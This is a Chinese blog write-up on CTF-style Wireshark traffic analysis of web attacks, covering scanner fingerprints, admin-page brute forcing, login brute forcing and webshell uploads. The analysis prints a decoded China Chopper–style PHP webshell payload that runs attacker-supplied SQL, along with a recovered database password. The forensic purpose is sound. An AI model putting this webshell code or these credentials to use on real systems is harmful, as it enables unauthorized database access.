2021-05-03Wireshark流量包分析
目录
WEB扫描分析
后台目录爆破分析
后台账号爆破
WEBSHELL上传
其他题目
参考链接
WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。
WEB扫描分析
题型:
通过给出的流量包获取攻击者使用的WEB扫描工具。
解题思路:
常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,WebReaver,Sqlmap等。要识别攻击者使用的是哪一种扫描器,可通过wireshark筛选扫描器特征来得知。
相关命令:http contains “扫描器特征值”。
1.awvs:acunetix
2.netsparker:netsparker
3.appscan:Appscan
4.nessus:nessus
5.sqlmap:sqlmap
常见的扫描器特征参考:常见扫描器或者自动化工具的特征(指纹)
【练习】安恒八月月赛流量分析:黑客使用的是什么扫描器?
后台目录爆破分析
题型:
已知攻击者通过目录爆破的手段获取了网站的后台地址,请通过给出的流量包获取后台地址。
解题思路:
要获取流量包中记录的后台地址,可通过wireshark筛选后台url特征来得知。
相关命令:http contains “后台url特征”。
常见后台url特征:
1.admin
2.manager
3.login
4.system
【练习】安恒八月月赛流量分析:黑客扫描到的后台登录地址是什么?
/admin/login.php?rec=login
后台账号爆破
题型:
已知攻击者通过暴力破解的手段获取了网站的后台登陆账号,请通过给出的流量包获取正确的账号信息。
解题思路:
WEB账号登陆页面通常采用post方法请求,要获取流量包中记录的账号信息可通过wireshark筛选出POST请求和账号中的关键字如‘admin’。
相关命令:http.request.method=="POST" and http contains "关键字"。
【练习】安恒八月月赛流量分析:黑客使用了什么账号密码登录了web后台?
思路1:登陆后台99%使用的是POST方法,使用过滤器+追踪TCP流,有302重定向则登录成功。刚才使用扫描的源ip一定是黑客的ip地址,使用过滤可得
http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"
思路2:返回字段长度为75X,说定post登录成功(目前没搞懂)
WEBSHELL上传
题型:
已知攻击者上传了恶意webshell文件,请通过给出的流量包还原出攻击者上传的webshell内容。
解题思路:
Webshell文件上传常采用post方法请求,文件内容常见关键字eval,system,assert要。获取流量包中记录的webshell可通过wireshark筛选出POST请求和关键字.
相关命令:http.request.method=="POST" and http contains "关键字"
【练习】安恒八月月赛流量分析:黑客上传的webshell文件名是?内容是什么?
Form item: "action" = "QGluaV9zZXQgKCAiZGlzcGxheV9lcnJvcnMiLCAiMCIgKTtAc2V0X3RpbWVfbGltaXQgKCAwICk7
QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSAoIDAgKTtlY2hvICgiLT58Iik7OyRtID0gZ2V0X21h
Z2ljX3F1b3Rlc19ncGMgKCk7JGNvbmYgPSAkbSA/IHN0cmlwc2xhc2hlcyAo
这样好像并不完整,追踪tcp流
其他题目
1.某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么
思路一:导出对象,搜索robots.txt
保存,然后打开
flag:flag:87b7cb79481f317bde90c116cf36084b
思路二:直接过滤http contains"Disallow"
2.某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少
常见的方法是:
根据http contains"dbhost"找到数据库服务器地址10.3.3.101之后,追踪tcp流
@ini_set ( "display_errors", "0" );@set_time_limit ( 0 );@set_magic_quotes_runtime ( 0 );echo ("->|");;$m = get_magic_quotes_gpc ();$conf = $m ? stripslashes ( $_POST ["z1"] ) : $_POST ["z1"];$ar = explode("choraheiheihei", $conf);$dbn = $m ? stripslashes ( $_POST ["z2"] ) : $_POST ["z2"];$sql = base64_decode ( $_POST ["z3"] );$T = @mysql_connect($ar[0],$ar[1],$ar[2]);@mysql_query ( "SET NAMES utf8" );if($dbn==""){$sql = "SHOW DATABASES";$q = @mysql_query ( $sql );$i = 0;while($rs=@mysql_fetch_row($q)){echo(trim($rs[0]).chr(9))."\t|\t\r\n";}@mysql_close($T);;echo("|<-");die();}else{ @mysql_select_db ( $dbn );$q = @mysql_query ( $sql );$i = 0;while ( $col = @mysql_field_name ( $q, $i ) ) {echo ($col . "\t|\t");$i ++;}echo ("\r\n");while ( $rs = @mysql_fetch_row ( $q ) ) {for($c = 0; $c < $i; $c ++) {echo (trim ( $rs [$c] ));echo ("\t|\t");}echo ("\r\n");}@mysql_close ( $T );;echo ("|<-");die ();}
base64解码之后,如上
提取出以下主要文本
&z1=10.3.3.101choraheiheiheiwebchoraheiheiheie667jUPvJjXHvEUv&z2=web&z3=c2VsZWN0ICogZnJvbSBkb3Vfc2hvdw==
$ar = explode("choraheiheihei", $conf)
可知以choraheiheihei为分割符号,提取出用户名为web,密码为e667jUPvJjXHvEUv
3.某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么(手上没有webtwo.pcap)
4.某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么
- 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip
某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)(没有对应的pcap)
某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是多少(没有对应的pcap)
参考链接
CTF流量分析之题型深度解析
ctf之流量分析
安恒八月月赛流量分析writeup
2021-05-03Wireshark流量包分析相关推荐
- Wireshark之流量包分析+日志分析 (护网:蓝队)web安全 取证 分析黑客攻击流程(上篇)
前言:小编也是在前几天通过,安恒的资深项目经理讲解(甘老师),老师风趣幽默,讲解生动形象,在他讲解的时候,我就萌生出要把这知识点分享出来,当然这只是为小白开启分析之路,并没有什么高操作,分享的只是我的 ...
- Wireshark之流量包分析+日志分析 (护网:蓝队)web安全 取证 分析黑客攻击流程(下篇)
前言:咦!确实让我想不到的是,这几天有不少的人催我更新分析的下篇!我以为这像便秘的粑粑,又臭又长没人看!但出乎意料,这不我加班加点就来满足你们咯!所以你懂的(悄悄告诉你:"点赞") ...
- Bugku 分析 特殊后门(wireshark流量包分析)
我们根据题目提示可以看到提示我们flag可能在这几个协议中我们打开wireshark分析下 虽然我是直接一开始就搜的icmp.... 我们在往下看, 是不是看的有点眼熟接下来我们顺着一个一个看,便可以 ...
- TLS握手协议分析与理解——某HTTPS请求流量包分析
https://xz.aliyun.com/t/1039 HTTPS简介 HTTPS,是一种网络安全传输协议,在HTTP的基础上利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护 ...
- [2021.05.26]AudioTrack流程分析
转载自: Android深入浅出之Audio 第一部分 AudioTrack分析_阿拉神农的博客-CSDN博客 UML顺序图: AudioTrack.svg https://download.csdn ...
- 2021.05.11丨COG分析柱状图绘制
目录 摘要 环境与方法 文档准备 分类简称及描述 比对结果 使用代码 结果展示 总结 摘要 在RNA-seq项目中,需要将差异基因比对到各个数据库当中,生成相应的注释结果和图像,便于深度挖掘信息.CO ...
- CTF 流量包相关-流量分析(1)
声明一下 本文是根据b站-风二西大佬的视频边做题边总结写成的,可以去支持一下风佬,风佬太强辣!!! 风佬流量分析题合集 风佬流量分析配套题与脚本 另外本人也是个初学者,文章里面如果有错误,记得来踢我 ...
- 【wireshark、MISC】将pcapng文件转为pcap文件,再用NetworkMiner分析流量包
有的时候,我们在wireshark分析流量包,一直找,都找不到有用的信息,看又看不太懂,那么NetworkMiner就是一个很好的选择. 我们在NetworkMiner里面可以很清晰地看出啥给谁发送了 ...
- 一次HTTP(S)请求究竟需要多少流量?Wireshark抓包分析
来自:指月 https://www.lixueduan.com 原文:https://www.lixueduan.com/post/network/06-http-flow/ 本文主要通过抓包分析了一 ...
最新文章
- HDU5934(强连通分量)
- 华为S5700交换机开启telnet登录
- 走财运健步——青龙羊毛
- 包r语言_R语言代码共享:制作R包
- UCSB微软提出VIOLET,用Masked Visual-token Modeling进行端到端的视频语言学习!性能SOTA...
- 算法高级(14)-Nginx的负载均衡策略
- OpenShift 4 Hands-on Lab (10) 限制集群资源的使用量
- python中or的用法_解析python中and与or用法
- [转]HSPICE软件的应用及常见问题解决
- 我造的假我自己打,Adobe推出“反PS”
- mysql自学完整_MySQL自学篇_MySQL
- 炒股50问——走向职业操盘的简单问答!
- 贵州等保测评机构工程师(DJCP)目录-贵州等级保护测评机构工程师名单
- python爬虫自学笔记本(2015.12.14)
- android自定义控件
- Adobe photoshop 用户名、组织或序列号丢失或无效的解决方法
- 实验四 类和对象;类的继承和派生;多态性; 接口;构造器应用
- 我的世界红石科技计算机系统,《我的世界》红石计算机简单教程
- Gale-Shapley 算法 寻找稳定婚配java实现
- [统计]_怎样用数据炒菜:统计建模的两种文化
热门文章
- MIUI v5内测版泄漏!
- OpenCV参考手册之Mat类详解(二)
- 不轻易评价,就是对别人最大的尊重
- oracle实验报告2:: Oracle数据库物理存储结构管理(含实验小结)
- 异构网络互联(计算机网络)
- 有哪些产品适合做引流?什么样的产品才适合做引流款
- 入职第一天,我接手了号称【屎山】的祖传代码,这还能卷吗???
- win10系统更新遇到 “我们无法完成更新,正在撤销更改“ 解决办法
- ACM Uva10763 交换学生
- zb system login.php,zblog 修改后台登陆地址的教程